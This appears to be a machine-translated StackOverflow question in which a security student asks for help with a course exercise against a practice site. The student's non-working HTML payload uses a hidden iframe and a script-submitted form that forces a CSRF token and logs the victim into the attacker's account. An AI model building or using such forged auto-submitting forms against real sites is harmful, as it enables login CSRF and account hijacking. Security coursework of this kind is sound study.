Javascript 如何在虚拟网站上成功执行xss攻击？_Javascript_Php_Html_Xss_Setcookie

Javascript 如何在虚拟网站上成功执行xss攻击？

javascript php html

Javascript 如何在虚拟网站上成功执行xss攻击？,javascript,php,html,xss,setcookie,Javascript,Php,Html,Xss,Setcookie,在我的安全课程中，我们被告知在这个网站上使用firefox进行xss攻击 http://permalink.co/ 不用担心，这是一个专门为我们设置的网站，以实践安全性。对于令牌验证，您看到的csrf字段应该设置为1，令牌是随机的，而xss字段应该设置为0。我们应该编写一个html文件并包含其他语言，比如javascript，这样当浏览器执行我们的文件时，它应该只显示一个空白页面。但当刷新时，它应该显示我们已登录到我上面给出的网站。用户名为“攻击者”，密码为“l33th

在我的安全课程中，我们被告知在这个网站上使用firefox进行xss攻击

http://permalink.co/

不用担心，这是一个专门为我们设置的网站，以实践安全性。对于令牌验证，您看到的csrf字段应该设置为1，令牌是随机的，而xss字段应该设置为0。我们应该编写一个html文件并包含其他语言，比如javascript，这样当浏览器执行我们的文件时，它应该只显示一个空白页面。但当刷新时，它应该显示我们已登录到我上面给出的网站。用户名为“攻击者”，密码为“l33th4x”

我基本上需要锁定密码、用户名和令牌。我想出了一个使用cookie并将令牌设置为“abc”的计划。因此，当我登录时，我使用我知道的用户名和密码，以及我故意设置的token=abc。但是我的代码不起作用，有人告诉我需要两个表单，第一个用于将cookie令牌设置为“abc”，第二个用于使用这三个参数登录。但我不知道在第一份表格里写什么。我想出了下面的代码，但它不工作，我需要帮助

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>   
<head>       
<title> set csrf to 0 and xss to 4 on http://permalink.co/ </title>        
</head>
<body>
<iframe style="border:none;width:0px;height:0px" id="iframe_submit"    name="iframe_submit"></iframe>        
<form id="form_id" action="http://permalink.co/login" method="POST" target="iframe_submit">       
<input type="hidden" name = "csrf_token" value="abc"><br>
<input type="hidden" name = "username" value="attacker"><br>        
<input type="hidden" name = "password" value="l33th4x"><br>    
</form>
<script type="text/javascript">
document.setcookie="csrf_token=abc";
document.forms["form_id"].submit();                              
</script>
</body>
</html>

要获得问题的第一手资料，请访问下面的网站并查找数字2.1。这是上个月到期的，但我不明白，考试快到了；

它应该与StackOverflow或不StackOverflow有关hacklang标签在这里做什么？我以为它是“hacking”。我要编辑it@kuldeep，谢谢你建议使用堆栈交换，我从来没有用它来回答过这样的问题，因为它们都在这里得到了回答。但我会在事后尝试，因为这个问题需要编码。我的编码错了。所以，当我把它带到stack exchange时，他们会告诉我，任何处理编码的东西都属于堆栈溢出。有人告诉过我。